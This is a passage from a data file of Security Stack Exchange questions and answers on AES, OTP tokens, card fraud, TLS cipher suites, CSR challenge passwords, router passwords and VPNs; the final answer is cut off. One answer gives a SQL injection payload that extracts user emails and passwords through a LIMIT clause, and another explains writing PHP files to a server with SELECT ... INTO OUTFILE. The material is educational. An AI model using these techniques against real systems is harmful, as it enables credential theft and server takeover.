source_id (int64, values 1 to 4.64M) | question (string, 0 to 28.4k chars) | response (string, 0 to 28.8k chars) | metadata (dict)
---|---|---|---|
76,452 | I am implementing an AES 256 algorithm on credit cards and I am wondering if I would be strengthening or weakening the encrypted dataset if I split the dataset and persisted it in two locations. I don't understand AES algorithm enough to know if 'all bits must be present for cracking' or if a subset of the encrypted data actually makes it easier to crack. Here is the scenario: Text to encrypt : 4798531212123535 Algorithm : AES256 Key : b0882e32f1194793800f4f0b43ddec6b273d31aafc474c4c8a3d5ae35b3e104b Encrypted data : GoCN4o35w4vzU4hQp47CLUgsTgaxRvvT7qdTVh5Hl+I= Q1 : If I were to split the dataset into 2 parts and store them in 2 repositories in 2 parts of the country...If one of the parts were compromised, did I weaken the security by splitting? Q2 : A following question would be: if the partial dataset & the key were compromised, can the key be used to decrypt part of the dataset or does the entire dataset have to be present to win? Part 1 : GoCN4o35w4vzU4hQp47CLUgs Part 2 : TgaxRvvT7qdTVh5Hl+I= ------------ Added for clarity -------------- If Part 1 and the Key were compromised, would the result of decryption result in anything of value? Would the result be a correct sequence of characters? Compromised values : Part 1 : GoCN4o35w4vzU4hQp47CLUgs Key : b0882e32f1194793800f4f0b43ddec6b273d31aafc474c4c8a3d5ae35b3e104b Would the decrypted value be something like: 47985312 (which is a sequence of the original) | You are doing it wrong. Not in the splitting or whatever; but in the thinking . AES encryption, if done properly, won't be "cracked". AES is the most robust piece in your system; this is the last part of it that you should be worrying about. What AES encryption provides is a very specific functionality: using a given key K , it transforms a piece of data (the "plaintext") into something that is unreadable (the "ciphertext") except to those who know K , because knowing K allows for reversing the transformation. As long as K remains unknown to attackers, the encrypted data is safe. If K is known to attackers, then they have won, and no amount of splitting, or swapping, or dancing around a fire while chanting the glory of the Great Spirit, will save you. AES uses keys of 128, 192 or 256 bits. There are so many possible keys that probability of an attacker compromising the key through pure luck is infinitesimal. 128-bit keys are sufficient for that; larger keys are not meant to increase security but to assert your status of alpha male among your fellow developers. If you really need to engage into elaborate data-shuffling rituals so that, for instance, your boss gets the impression that "security is happening" and you are not slacking away, then you may as well do it properly. Don't split; instead, given a sequence of bytes C (the encrypted string), generate a sequence of random bytes D of the same length; then "split" C into two shares C 1 = C XOR D , and C 2 = D . To assemble the shares, just XOR them together: it so happens that C 1 XOR C 2 = C . That kind of splitting is demonstrably secure (an attacker who learns C 1 or C 2 , but not both, learns exactly nothing , in an information-theoretic sense, which is about as good as any crypto can get). Provided, of course, that you don't botch things (you MUST generate a strongly random D , and generate a new one each time you have some string to "split"). | {
"source": [
"https://security.stackexchange.com/questions/76452",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/63870/"
]
} |
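The answer above describes the XOR-based secret splitting only in prose. Below is a minimal Python sketch of that scheme (an illustration, not part of the original answer), using the standard-library secrets module for the random mask; the function names and the reuse of the question's base64 string as an opaque byte blob are assumptions for demonstration only.

```python
import secrets

def split(ciphertext: bytes):
    """Split an encrypted blob into two shares; neither share alone reveals anything."""
    mask = secrets.token_bytes(len(ciphertext))               # fresh random D for every split
    share1 = bytes(c ^ d for c, d in zip(ciphertext, mask))   # C1 = C XOR D
    share2 = mask                                             # C2 = D
    return share1, share2

def combine(share1: bytes, share2: bytes) -> bytes:
    """Recombine the shares: C1 XOR C2 = C."""
    return bytes(a ^ b for a, b in zip(share1, share2))

if __name__ == "__main__":
    c = b"GoCN4o35w4vzU4hQp47CLUgsTgaxRvvT7qdTVh5Hl+I="  # the ciphertext from the question, treated as opaque bytes
    s1, s2 = split(c)
    assert combine(s1, s2) == c          # the two shares together recover the original
    assert s1 != c and s2 != c           # neither share equals the ciphertext (with overwhelming probability)
```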
76,480 | I have been using RSA SecurID® keys for quite some time now (perhaps 10 years), for things such as securely accessing my home banking account online or accessing my company's network of computers from home. These keys generate a 6-digit numeric token which is set to expire. However, I've always wondered how these work. On the right-hand side there is a dot (not shown in the picture) which blinks once per second, and on the left there is a stack of six vertically-stacked horizontal bars, each of which disappears once every ten seconds. Every time sixty seconds have passed, the token resets itself, and the previous token becomes invalid. AFAIK these devices don't make use of the network, and the numbers they generate must be checked by the server (whether the server be a bank or a company's server). Hence, inside this device there must be stored an algorithm that generates random numbers with a mechanism that includes a very precise timer powered by a small battery. The timer
must be very precise, since the server needs to check the validity of the generated digits in the very same time interval. For every user/employee, the server must, as far as I understand, store the same random-number-generating algorithm, with one such algorithm per customer/employee. The chip must of course be constructed in such a way that if it is stolen, the attacker cannot access the random-number-generating algorithm stored therein, even if the device is broken. Is this how this works? Thanks! | Yes, it does work as you say. The chip is "tamper resistant" and will erase the "seed" (secret key) if any attempt is made to attack it. This is often accomplished by having a non-user-replaceable battery and a "trap" that breaks power to the device once the device is opened, or the chip surface is removed. The key is then stored in SRAM, requiring power to keep the key. The key is a seed that, combined with the current time in 60-second steps (effectively, the current UNIX timestamp / 60), produces the code. No, the device does NOT need to be precise. Instead, the server will store the time of the last accepted code. Then the server will accept a code one minute earlier, one minute ahead, and at the current time, so if the current time at the server is 23:20, then it will accept a code from 23:19, 23:20 and 23:21. After this, it will store the time of the last accepted code, e.g. if a 23:21 code was accepted, it will store 23:21 in a database, and refuse to accept any code that was generated at 23:21 or earlier. Now to the interesting part: To prevent an imprecise token from desynchronizing from the server, the server will store in its database whether it was required to accept a 23:19 code or a 23:21 code at 23:20 time. This ensures that at the next logon, the server will correct by that number of steps. Let's say you, at clock 23:20, log in with a 23:19 code. The server stores "-1" in its database (and if it had been a 23:21 code, it would store "+1" in the database). The next time you log in, the clock is 23:40. Then the server will accept a 23:38, 23:39 or 23:40 code.
If a 23:38 code is accepted, it will store "-2" in the database, at 23:39 it will keep "-1" in the database, and at 23:40 it will store "0" in the database. This effectively makes sure the server stays synchronized with your token. On top of this, the system, if a token "ran too far away" from the server (due to it being unused for a long time), allows resynchronization. This is accomplished either by a system administrator, or a self-service resynchronization service is presented where the token user is asked to provide 2 subsequent codes from the token, like 23:20 and 23:21, or 19:10 and 19:11. Note that the server will NEVER accept a token code generated at or prior to the time of the "last used token code" (as this would allow reuse of OTP codes). When a resynchronization is done, the server will store the difference between the provided 2 token codes and the current server time, and in a resync the search window could be like plus/minus 50 steps (which would allow about 0.75 hours of desync in both directions). The server can detect a desynchronized token by generating the 50 prior codes and 50 future codes, and if the specified code matches those, it will launch the resync process automatically. Many times, to prevent an attacker from using the resync process to find valid codes, once an account is in resync mode, login will not be accepted without resyncing, which would require the attacker to find the exact code subsequent or prior to the code just found. | {
"source": [
"https://security.stackexchange.com/questions/76480",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/34560/"
]
} |
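The acceptance-window and drift bookkeeping described in the answer above can be made concrete with a rough Python sketch. The HMAC-based code generator here is a stand-in (the real SecurID algorithm is proprietary), and the ±1-step window, the "drift"/"last_step" fields and the per-token state dictionary are illustrative assumptions rather than the vendor's actual schema.

```python
import hashlib
import hmac
import time

STEP = 60  # one code per 60-second window, as in the answer

def code_for(seed: bytes, step: int) -> str:
    """Stand-in code generator (HMAC of the step counter); the real algorithm is proprietary."""
    digest = hmac.new(seed, step.to_bytes(8, "big"), hashlib.sha1).digest()
    return "%06d" % (int.from_bytes(digest[:4], "big") % 1000000)

def verify(seed: bytes, submitted: str, state: dict, now: float = None) -> bool:
    """Accept a code from the previous, current or next step, adjusted by the stored drift."""
    now_step = int((now if now is not None else time.time()) // STEP) + state.get("drift", 0)
    for offset in (-1, 0, 1):
        step = now_step + offset
        if step <= state.get("last_step", -1):      # never accept a code at or before the last used one
            continue
        if hmac.compare_digest(code_for(seed, step), submitted):
            state["last_step"] = step               # remember the last accepted step
            state["drift"] = state.get("drift", 0) + offset  # a slow token accumulates -1, -2, ...
            return True
    return False

# Example: a token running one minute slow is still accepted, and the drift is remembered.
state = {}
seed = b"per-token secret seed"
slow_code = code_for(seed, int(time.time() // STEP) - 1)
print(verify(seed, slow_code, state), state)   # True, with drift -1 recorded
```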
76,660 | I don't own a credit card but have read much about fraud with stolen credit cards. Since I don't own one, I don't know how exactly you buy online using your credit card, so please correct me if I am wrong (and I hope so). Customer chooses articles in an online shop and puts them into the shopping
cart. Customer goes to the virtual check out. Customer enters delivery address and his cc data(?) and sends them to the server of the shop owner. Shop server sends the cc data the customer entered and his data and the amount to the cc card server and receives the money. Customer receives bought articles. The shop owner wasn't very honest and uses the cc data the customer entered to shop on other online shops (especially
non-trackable goods like software licenses, ...). Since the data is
the same for all shops, nobody knows which shop misused the cc data. Why not use a one-time authentication code or token instead? For example, the customer enters the cc data on the server of the cc company, which sends a confirmation to the shop owner or gives a signed token (like GPG) which the user gives the shop to prove he sent the money, or the shop just waits till it sees the money on its account?
Since I have basic IT-security knowledge, you might also add technical details.
So are my assumptions right, and if so, what prevents web shop owners from misusing credit card data? | The liability for a disputed transaction falls upon the merchant for Card-Not-Present transactions. Essentially, if you dispute a transaction and the merchant doesn't have your signature, then if you persist they will end up footing the bill. By the same token, when a CNP merchant double bills you, they're going to end up paying when you dispute the bill. As @DavidFoerster points out, the processors and card companies track chargeback rates. They eye the statistics and, when a merchant is having too many chargebacks, they get cut off. (Usually they get booted from their processor, and go find another processor who'll charge them more for the higher risk). The same is true with stores that re-abuse cards elsewhere. The card brands look at fraud reports and determine that these 20 fraud-report cards all had Bob's Web Shack in common as a past transaction. They will then investigate Bob's Web Shack - both because it might be a bad shop owner, and because it might be a shop that's compromised. And - again - if a shop is a source of problems, they'll get cut off. That's what prevents web shop owners from abusing the cards. They'll lose any disputes, and then they'll get dropped and be unable to process cards. | {
"source": [
"https://security.stackexchange.com/questions/76660",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/64016/"
]
} |
76,706 | A friend of mine built a web application that I'm testing for fun. I noticed that he allows a user to set the limit of a certain query, and that limit is not sanitized. For example, I can choose any number or string I like as a limit. I realize that this is SQL injection , and I can easily inject SQL commands, but is it really possible to extract any data or do any damage with a LIMIT ? Example of the query: SELECT * FROM messages WHERE unread = 1 LIMIT **USER INPUT HERE** I understand that if the injection was in the WHERE clause I could've easily done a UNION SELECT to extract any information, but is that really possible if the user input was after the limit? For more information, my friend is using the MySQL DBMS, so you can't really execute two queries such as: SELECT * FROM messages WHERE unread = 1 LIMIT 10;DROP TABLE messages-- It is not possible. | You can make a UNION SELECT here. The only problem is to match the columns from messages, but you can guess those by adding columns until it fits: SELECT * FROM messages WHERE unread = 1 LIMIT
1 UNION SELECT mail,password,1,1,1 FROM users Just keep adding ,1 until you get the correct column count. Also, you need to match the column type; try null instead of 1. If you can see MySQL errors, that would help big time here. Otherwise you've got a lot of trial and error ahead of you. Also see Testing for SQL Injection at owasp.org for some details. | {
"source": [
"https://security.stackexchange.com/questions/76706",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/64055/"
]
} |
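To make the mechanism in the answer above concrete: the vulnerability exists because the user-supplied limit is pasted directly into the SQL text. The sketch below uses Python and SQLite purely so it is self-contained (the question concerns MySQL/PHP, where the same pattern applies); the table layout and function names are assumptions for illustration, and it contrasts the unsafe string interpolation with integer casting plus parameter binding.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE messages (id INTEGER, body TEXT, unread INTEGER)")
conn.execute("INSERT INTO messages VALUES (1, 'hello', 1)")

def fetch_unread_unsafe(limit_input: str):
    # Vulnerable pattern: the user-controlled value becomes part of the SQL text,
    # so "1 UNION SELECT ..." is executed exactly as described in the answer.
    query = "SELECT * FROM messages WHERE unread = 1 LIMIT " + limit_input
    return conn.execute(query).fetchall()

def fetch_unread_safe(limit_input: str):
    # One mitigation: force the value to an integer and bind it as a parameter,
    # so it can only ever act as a number, never as SQL.
    limit = int(limit_input)
    return conn.execute(
        "SELECT * FROM messages WHERE unread = 1 LIMIT ?", (limit,)
    ).fetchall()

print(fetch_unread_safe("10"))                 # works as intended
try:
    fetch_unread_safe("1 UNION SELECT name, sql, 1 FROM sqlite_master")
except ValueError as exc:
    print("rejected:", exc)                    # the injection attempt never reaches the database
```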
76,940 | I fairly understand the math behind RSA, Elgamal, AES, SHA but not how things are used in practise. How are subkeys different from master key? I understand its purpose from various websites but How is it internally implemented? How is it bound to the master key? Is it an OpenPGP terminology? | This post by user rjh from 2008 in the enigmail forum answers it well: Originally in PGP 2.6, back in the early 90s, you had just one keypair
and it was used for both encryption and signing. The ability to have
additional keypairs presented some engineering challenges. Ultimately,
it was decided that the additional keypairs would be called "subkeys",
despite the fact there's nothing "sub" about them. Likewise, what you
call your "key" isn't really a key at all--the terminology is a
holdover from the days when a key really was a key. Nowadays, a key is
really a collection of keys, along with some metadata for user
identifiers, signatures, etc. E.g., my "key" has four keypairs on it: 5B8709EB, D0C6AAE4, 71E177DB
and 8DB02BBB3. What GnuPG calls your "public key" is really the oldest signing key in
the collection. E.g., since 5B8709EB was created first, GnuPG calls
the entire set of keys and metadata the "5B8709EB key". So, "is it possible to have a key that's used for encryption and
signing without any subkey at all?" The answer here is no, because all keypairs on a key are subkeys. Even if there's only one of them. | {
"source": [
"https://security.stackexchange.com/questions/76940",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/2508/"
]
} |
76,993 | It has become quite difficult to configure an HTTPS service that maintains "the ideal transport layer". How should an HTTPS service be configured to permit some reasonable level of compatibility while not being susceptible to even minor attacks? TLS downgrade attacks in combination Beast, Crime, Breach, and Poodle knocks out most if not all of SSLv3 and prior. Microsoft is disabling SSLv3 by default , which sounds like a good move to me. Due to weaknesses in RC4 , MD5, and SHA1, there are even fewer cipher suites to choose from. Would an 'ideal' HTTPS service only enable TLS 1.0, 1.1 and 1.2 with key-size variants following ciphers? What should be the most preferred cipher suite? TLS_RSA_WITH_AES_128_CBC_SHA256
TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256
TLS_DHE_DSS_WITH_AES_128_CBC_SHA256
TLS_RSA_WITH_AES_128_GCM_SHA256
TLS_DH_RSA_WITH_AES_128_GCM_SHA256 | Would an 'ideal' HTTPS service only enable TLS 1.0, 1.1 and 1.2 with key-size variants following ciphers? No, an 'ideal' HTTPS service would enable only TLS 1.2 and enable only AEAD (Authenticated Encryption with Associated Data) based cipher suites with SHA-2, 4096 bit DH parameters and 521 bit EC curves of a type that matches your requirements (government approved or not government generated). Said service would also be unable to connect be used by a wide variety of older clients, including Android 4.3 and earlier, IE 10 and earlier, Java 7 (at least u25) and earlier), OpenSSL 0.9.8y and earlier (OpenSSL 1.0.0 is simply not listed on my source), and so on. It would, however, be immune to any attack that works only on TLS 1.1 and below, any attack relying on SHA-1, and any attack relying on CBC mode or outdated ciphers like RC4. Client cipher suite limitations per https://www.ssllabs.com . What should be the most preferred cipher suite? It depends! I assume Foward Secrecy is a requirement. I assume "believed to be reasonably secure at this time" is a requirement. I assume "actually implemented by at least one major actor" is a requirement. All requirements regarding must have/cannot use some or another subset of ciphers (must use X, can't use Y, etc.). Thus, I would propose the following lists as a reasonable start. Begin with the top category (TLS 1.2 AEAD), then keep going down the list and adding categories until you reach a level that works with your userbase or you've reached the end of your comfort zone, whichever comes first. Include as many cipher suites of each category as you can, so that when the next attack rolls around, you'll be able to remove the affected cipher suites and continue with the remainder. Keep an eye on the threat environment so you can continue removing cipher suites that demonstrate vulnerabilities. Within each major category, please order or cull the cipher suites according to your taste: DHE is of course slower than ECDHE, but takes elliptic curve provenance out entirely, and so on. At this time, it appears that ordering is a tradeoff, but if you want speed, prefer or even require TLS_ECDHE_*. If you don't trust the currently commonly implemented elliptic curves, or are concerned about elliptic curves due to the NSA Suite B guidance from Aug 2015 indicating a move away from prior Suite B elliptic curves is coming in the near future , and are willing to burn CPU, prefer or even require TLS_DHE_* suites. Bear in mind that "normal" certificates are RSA certificates, which work with both TLS_ECDHE_RSA_* and TLS_DHE_RSA_* cipher suites. DSA certificates which work with TLS_ECDHE_ECDSA_* cipher suites are very rare so far, and many CA's don't offer them. TLS 1.2 AEAD only (all are SHA-2 as well) TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256 (new 0xcca9, Pre-RFC7905 0xcc14) TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256 (new 0xcca8, Pre-RFC7905 0xcc13) TLS_DHE_RSA_WITH_CHACHA20_POLY1305_SHA256 (new 0xccaa, Pre-RFC7905 0xcc15) TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 (0xc030) TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 (0xc02f) For U.S. folks who are interested in NIST compliance, this is a TLS 1.2 should category cipher suite for servers using RSA private keys and RSA certificates per NIST SP800-52 revision 1 table 3-3 TLS_DHE_RSA_WITH_AES_256_GCM_SHA384 (0x9f) TLS_DHE_RSA_WITH_AES_128_GCM_SHA256 (0x9e) TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384 (0xc02c) For U.S. 
folks who are interested in NIST compliance, this is a TLS 1.2 should category cipher suite for servers using elliptic curve private keys and ECDSA certificates per NIST SP800-52 revision 1 table 3-5 TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256 (0xc02b) For U.S. folks who are interested in NIST compliance, this is a TLS 1.2 should category cipher suite for servers using elliptic curve private keys and ECDSA certificates per NIST SP800-52 revision 1 table 3-5 These are the highest level of security I'm currently aware of in common TLS implementations. As of Jan 2017, major modern browsers DO handle this level, including but not limited to Android with 6.0 supporting AES-GCM and - alone of the main ones - old valued CHACHA20-POLY1305 and 7.0 supporting new CHACHA20-POLY1305, Chrome with both AES-GCM and CHACHA20-POLY1305, Firefox with both AES-GCM and CHACHA20-POLY1305, IE and Edge with only AES-GCM, Java with only AES-GCM, OpenSSL 1.1.0 with both AES-GCM and CHACHA20-POLY1305, Safari with only AES-GCM). Many major browsers cannot handle this, even 2015 vintage ones (Safari 7 on OSX 10.9, Android 4.3 and earlier, IE 10 on Win7 (IE 11 even on Win7 will support 0x9f and 0x9e if Windows has been patched) TLS 1.2 SHA2 family (non-AEAD) TLS_DHE_RSA_WITH_AES_256_CBC_SHA256 (0x6b) TLS_DHE_RSA_WITH_AES_128_CBC_SHA256 (0x67) TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384 (0xc028) TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256 (0xc027) For U.S. folks who are interested in NIST compliance, this is a TLS 1.2 should category cipher suite for servers using RSA private keys and RSA certificates per NIST SP800-52 revision 1 table 3-3 TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384 (0xc024) For U.S. folks who are interested in NIST compliance, this is a TLS 1.2 may category cipher suite for servers using elliptic curve private keys and ECDSA certificates per NIST SP800-52 revision 1 table 3-5 TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256 (0xc023) For U.S. folks who are interested in NIST compliance, this is a TLS 1.2 should category cipher suite for servers using elliptic curve private keys and ECDSA certificates per NIST SP800-52 revision 1 table 3-5 TLS_ECDHE_RSA_WITH_CAMELLIA_256_CBC_SHA384 (0xc077) TLS_ECDHE_RSA_WITH_CAMELLIA_128_CBC_SHA256 (0xc076) TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA256 (0xc4) Note that you've lost AEAD mode and are using the much older CBC mode; this is less than ideal. CBC mode has been a contributing factor for several attacks in the past, including Lucky Thirteen and BEAST, and it's not unreasonable to believe that CBC mode may be related to future vulnerabilities also. Some modern browsers that don't have any AEAD cipher suites do have one more more suited in this category, for instance, IE 11 on Win7 can use TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256 and Safari 6 and 7 can use a few of these again, this is if you don't have ECDHE_ECDSA GCM suites working) TLS 1.0 and 1.1 with modern ciphers (and outdated hashes, since that's all that's available) TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA (0xc014) For U.S. folks who are interested in NIST compliance, this is a may category cipher suite for servers using RSA private keys and RSA certificates per NIST SP800-52 revision 1 table 3-2 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (0xc013) For U.S. 
folks who are interested in NIST compliance, this is a should category cipher suite for servers using RSA private keys and RSA certificates per NIST SP800-52 revision 1 table 3-2 TLS_DHE_RSA_WITH_AES_256_CBC_SHA (0x39) TLS_DHE_RSA_WITH_AES_128_CBC_SHA (0x33) TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA (0x88) TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA (0x45) TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA (0xc00a) Once you're including cipher suites from this level, you're likely to find something that works with almost all modern implementations. At this level, you're not only using CBC mode, you're also using SHA-1. NIST SP800-131A recommended that SHA-1 be disallowed for digital signature generation after Dec 31, 2013 (a year ago today, actually). TLS 1.0 and 1.1 with older but still reasonable ciphers and outdated hashes TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA (0x16) TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA (0xc012) For U.S. folks who are interested in NIST compliance, this is a should category cipher suite for servers using RSA private keys and RSA certificates per NIST SP800-52 revision 1 table 3-2 TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA (0xc008) For U.S. folks who are interested in NIST compliance, this is a should category cipher suite for servers using elliptic curve private keys and ECDSA certificates per NIST SP800-52 revision 1 table 3-4 IE 8 on Windows XP is still out of luck, as is Java 6u45 due to DH parameter maximums. This is absolutely the minimum level I'd recommend going to. Note that for servers using RSA private keys and RSA certificates who need NIST SP800-52 revision 1 compliance, you SHALL , should , and may implement specific other TLS_RSA_* cipher suites which DO NOT PROVIDE forward secrecy, and thus I would not recommend unless this compliance is required. Note also that paragraph 3.3.1 of that document states specific "The server shall be configured to only use cipher suites that are composed entirely of Approved algorithms. A complete list of acceptable cipher suites for general use is provided in this section..." Other national and industry requirements will vary, of course. and may conflict with each other; read all of those that apply to you carefully. I'll put in the usual plug here - try out your cipher list with your own tools (openssl ciphers -v '...' for openssl based systems), go to https://www.ssllabs.com/index.html first to check on cipher suites supported by various clients, then set up your site, and then go back to www.ssllabs.com and run their server test. Note that _ECDSA_ cipher suites require ECDSA certificates, of course, and those are still very hard to find. ETA: NSA Suite B EC advice, and IE 11/Win7 now supports 0x9f and 0x9e. ETA: As of Jan 2016, NIST SP800-52r1 is unchanged, and one new cipher suite (0xc00a) has been added to the list. ETA: As of Jan 2017, RFC7905 has change the three TLS 1.2 AEAD CHACHA20-POLY1305 ciphers, and "modern" browsers have drastically improved AEAD support as noted in new bullet. See https://www.iana.org/assignments/tls-parameters/tls-parameters.xhtml#tls-parameters-4 for up to date IANA cipher suites. | {
"source": [
"https://security.stackexchange.com/questions/76993",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/975/"
]
} |
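One way to express a policy along the lines of the answer above (TLS 1.2 as a floor, forward-secret AEAD suites only) is sketched below with Python's ssl module. This assumes Python 3.7+ and a reasonably recent OpenSSL; the cipher string is illustrative rather than a compliance recommendation, and the commented-out certificate paths are hypothetical.

```python
import ssl

# Illustrative policy: TLS 1.2 as a floor, forward secrecy (ECDHE) and AEAD suites only.
# The names below are OpenSSL spellings of the TLS_ECDHE_*_GCM / CHACHA20-POLY1305
# suites discussed above; adjust the list to your own compliance requirements.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.minimum_version = ssl.TLSVersion.TLSv1_2
ctx.set_ciphers(
    "ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384:"
    "ECDHE-ECDSA-CHACHA20-POLY1305:ECDHE-RSA-CHACHA20-POLY1305:"
    "ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256"
)
# ctx.load_cert_chain("server.crt", "server.key")   # hypothetical certificate/key paths

# Inspect what the underlying OpenSSL actually enabled after filtering.
for cipher in ctx.get_ciphers():
    print(cipher["name"], cipher["protocol"])
```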
77,028 | All the OpenVPN/ Easy-RSA tutorials that I've found, advise to setting an empty challenge password while building the key for the OpenVPN server. Anybody knows why? What's the intended use for the challenge password in Easy-RSA server's keys? And what about client's keys? I see that a build-key-pass exists to generate encrypted client keys, but no server equivalent exists. Still, both build-key and build-key-pass ask for a challenge password . | "Challenge password" is an obscure and usually useless feature. -> Leave empty. If your CA allows this, then the Challenge Password will be required of anyone who tries to get the cert revoked. -- But from what I understand there are few ( or none? ) CAs that actually use this. ( Please leave a comment if you know otherwise. ) So leave it empty if you're unsure. What's the intended use of a "Challenge Password"? As far as I understand it the idea is this: If you have a rogue admin who has access to the cert and key then that admin could revoke the cert and DOS you. But if you have a CA that will challenge the rogue admin to supply the "Challenge Password" , then the rogue admin may not have that password and then you're safe from that DOS. (The CP is NOT included in either cert or key. Only in the CSR. And you don't need the CSR for daily operations, so presumably operations personnel might not come into contact with the CSR file and therefore not know the Challenge Password .) (But bear in mind that you still have to worry about a rogue admin who has your cert/key. A lot. So from my understanding you gain exactly nothing from having a "challenge password" in the first place. -- Correct me if I'm wrong. I've got the feeling I'm missing some essential idea here. -- Maybe this is meant to allow revocation by somebody holding just the certificate and the password but NOT the private key.) Further reading The (too short) official definition is here: RFC 2985: PKCS #9: Selected Object Classes and Attribute Types Version 2.0, Section 5.4.1: Challenge password The question comes up regularly: https://superuser.com/questions/376179/confusion-with-pem-pass-phrase-and-challenge-password https://serverfault.com/questions/266232/what-is-a-challenge-password Further source: Randall Perry, "OpenSSL-Users" mailing list, 2014-05-22, Re: CSR challenge password: What's the point? | {
"source": [
"https://security.stackexchange.com/questions/77028",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/61529/"
]
} |
77,039 | Is it possible to execute some code (e.g. PHP code on a PHP-based web application) on the server through SQL injection? If yes, how exactly? I understand that un-escaped field can lead to SQL injection and an attacker can execute SQL commands of his choice directly on the server. But I think of running only SQL commands, not some arbitrary code. Am I wrong here? | SQL database systems typically have an export mechanism which can write arbitrary files on the server, e. g. SELECT ... INTO OUTFILE in MySQL. If an attacker is able to assemble such a query and isn't stopped by restrictive permissions, they can in fact create PHP scripts. Now they still need to get the server to execute the script. In the easiest case, they have write access to a web directory. If they request the script, the webserver will happily execute it. | {
"source": [
"https://security.stackexchange.com/questions/77039",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/64186/"
]
} |
77,112 | How bad is it to not change the default home router password? Are there any concrete dangers? Are there any attacks directly resulting out of the use of default passwords, not vulnerabilities in the firmware?[*] You can assume that anyone legitimately connected to the router is allowed to access and change it's configuration [**]. [*] I found this vulnerability , but it seems to be a vulnerability in the router firmware (which could be prevented using anti-csrf tokens), not a direct result of using a default password. [**] So I'm not worried about other residents or visitors that are allowed access to the network. | The wireless router is the gateway to your entire home network, from a wireless baby monitor, to the secure computers you do your banking on. Controlling this gateway gives an attacker access to the devices inside the network and to data that passes through it. It's no surprise that home routers are a new frontier for the criminal underground and default passwords is one of the main vectors of attack. In 2011 and 2012 attackers exploited a vulnerability to change the DNS settings of more than 4.5 million DSL modems in Brazil. In March 2014 Team Cymru reported that over 300,000 home routers had been compromised and had their DNS settings changed in a global attack campaign. In September 2014 , again there was a large scale attack on Brazilian routers. Most of these attacks involved two vulnerabilities, a CSRF (Cross-Site Request Forgery) that is present in many brands of routers and default passwords. This means that visiting a malicious website will force your web browser to log into your home router and make configurations changes. This article describes a similar attack and its severe consequences. It all started in 2007 when this attack was published . The main condition for the attack to be successful was that the attacker to guess the router password, because back then, even Cisco had 77 routers vulnerable to CSRF. And the problem of default passwords is still real in 2014: Tripwire spoke to 653 IT and security professionals, and 1009 remote workers in the US and UK –
with alarming results. Thirty percent of IT professionals and 46% of
workers polled do not even change the default password on their
wireless routers. Even more (55% and 85%, respectively) do not change
the default IP address on their routers (making cross-site request
forgery – CSRF – attacks much easier).
( Source ) The dangers of having the internet-facing admin panel with default passwords should be obvious. But an open network with the admin panel open to the local network is vulnerable to local attacks. Wardriving with good antennas can cover large areas and spot many vulnerable routers. Once they have access, an attacker can change DNS settings and intercept data for serving malware, ads or phishing. Or they can open up the internal network and attack some old unpatched Android phones, and maybe hope that one of those devices will travel and be an entry point to a different, higher-value network. Also, routers most likely store credentials for connecting to the ISP, which can be reused or abused by the attacker. I've heard of wireless routers that had one open network for guests and one password-protected network. Connecting to the open network and accessing the admin panel with default credentials allowed access to the router configuration file that had the WPA key for the password-protected network. While some users are ignorant about security, there are router manufacturers that aren't ignorant about their users' security and provide unique admin passwords for each router. Most passwords are printed on a permanent sticker along with the other details such as model and MAC address. This is not as secure as my recently purchased router, which had the password printed on a card and which required changing it on first use. As Malavos mentioned in the comments, there are ISPs that lease routers with default passwords and even some that forbid changing those default passwords. I'm adding that some ISPs will change the default passwords and use them to configure the router remotely, but they will set the same password for all their clients' routers. This is problematic because that password can be recovered through hardware hacking, so every router with that password can be compromised, even remotely. Main rules for protecting wireless routers: update router firmware, turn off unneeded services, and set strong admin passwords. | {
"source": [
"https://security.stackexchange.com/questions/77112",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/8754/"
]
} |
77,241 | I know that with SSL/TLS, man in the middle attacks are not possible. For example if Alice and Bob are trying to communicate and Trudy is trying to perform a man in the middle attack, then when Alice gets the public key from Bob (but really it is Trudy tricking Alice), the public key will not match with the certificate authorities and therefore not work. I know with SSH, only the first connection to a server is possibly open to an active man in the middle attack. This is because during the first connection, the client records the server's public key in $HOME/ssh/known_hosts file. Every connection after that checks this file to make sure the public keys match. But how does VPN encryption work with connection set-up? Are certificates used for passing the symmetric keys like in SSL/TLS? If not, does this not make VPNs vulnerable to active man in the middle attacks during key exchanges? | In order to protect from a man-in-the-middle attack, at least one of the endpoints of the communication needs to have some prior knowledge about the other endpoint. It's usually up to the client to verify that it's talking to the right server, because servers tend to allow potentially any client to connect to them. The general term for the kind of infrastructure that provides this prior knowledge is a public-key infrastructure . In the case of HTTPS, the prior knowledge normally comes with the intermediate step of a certificate authority . A web browser contains a predefined list of CA with their public keys, and accepts a website as genuine if it can 